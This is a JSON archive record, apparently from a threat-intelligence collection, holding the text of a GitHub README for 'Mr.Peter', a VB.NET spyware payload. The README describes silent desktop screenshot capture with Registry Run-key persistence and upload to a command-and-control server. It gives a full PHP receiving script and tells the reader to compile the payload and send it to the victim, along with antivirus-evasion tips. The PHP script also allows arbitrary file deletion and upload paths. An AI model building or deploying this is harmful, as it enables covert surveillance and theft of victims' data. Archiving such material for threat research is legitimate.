{
	"id": "0b84dd3d-c328-4ee8-ba36-f06376a41d1c",
	"created_at": "2026-04-06T00:10:27.528915Z",
	"updated_at": "2026-04-10T03:21:47.663903Z",
	"deleted_at": null,
	"sha1_hash": "4a578d7539a626b458db4a4fcfe2ce9ce31c62ec",
	"title": "GitHub - mrfr05t/Mr.Peter: Silent Screenshot Capture | Post Exploitation Payload | VB.NET",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 247884,
	"plain_text": "GitHub - mrfr05t/Mr.Peter: Silent Screenshot Capture | Post\r\nExploitation Payload | VB.NET\r\nBy mrfr05t\r\nArchived: 2026-04-05 19:25:09 UTC\r\nforthebadge\r\nSilent Screenshot Capture | Post Exploitation Payload | VB.NET\r\nA simple payload to take the screenshot of victims desktop and upload it to the C\u0026C.\r\nFeatures:\r\nPersistent (Using Registry Run Key)\r\nWorks in background\r\nLess Code Less Bugs and Less Detection ;)\r\nDeletes the screenshot from disk after upload it to C\u0026C\r\nC\u0026C server in base64\r\nhttps://github.com/mrfr05t/Mr.Peter\r\nPage 1 of 3\n\nUpload screenshots in organized way on C\u0026C\r\nNo port forwarding needed! works with a single php file\r\n[TODO] Machine Information\r\n[TODO] Encryption\r\n[TODO] Set interval remotely from C\u0026C\r\nInstallation \u0026 Usage:\r\nClone this repository.\r\nA webhosting i recommend namecheap\r\nGoto your public_html folder and make new PHP file and put below code in it\r\n\u003c?php\r\n$del = $_GET[\"dellog\"];\r\n$folder = $_GET[\"folder\"];\r\nmkdir($folder,0777);\r\n$file = $_GET[\"path\"];\r\nif (!empty($_FILES[\"file\"])){\r\nmove_uploaded_file($_FILES[\"file\"][\"tmp_name\"],\r\n $file . \"/\" . $_FILES[\"file\"][\"name\"]);\r\n}\r\nunlink($del);\r\n?\u003e\r\nOpen the project in Visual Studio and the edit below variable in source code\r\nDim server As String = BaseDecode1(\"your server address here in base64 encoded\")\r\nand edit this variable below as well\r\nDim php As String = \"yourphpfilename.php?\" \u0026 \"folder=\"\r\nJust compile it and send it to the victim thats all !!\r\nMillion Dollar Advice ;)\r\nTo Avoid Antivirus Detection\r\nChange the app icon\r\nGenerate new GUID\r\nChanges all the variables\r\nObfuscate the code using Obfuscar\r\nChange the Assembly information\r\nhttps://github.com/mrfr05t/Mr.Peter\r\nPage 2 of 3\n\nDonation:\r\nIf this tool has been useful for you, feel free to thank me by buying me a coffee :)\r\nDisclaimer:\r\nThis tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without\r\nexplicit permission is illegal.\r\nLicense:\r\nGNU GENERAL PUBLIC LICENSE\r\nSource: https://github.com/mrfr05t/Mr.Peter\r\nhttps://github.com/mrfr05t/Mr.Peter\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/mrfr05t/Mr.Peter"
	],
	"report_names": [
		"Mr.Peter"
	],
	"threat_actors": [],
	"ts_created_at": 1775434227,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a578d7539a626b458db4a4fcfe2ce9ce31c62ec.pdf",
		"text": "https://archive.orkl.eu/4a578d7539a626b458db4a4fcfe2ce9ce31c62ec.txt",
		"img": "https://archive.orkl.eu/4a578d7539a626b458db4a4fcfe2ce9ce31c62ec.jpg"
	}
}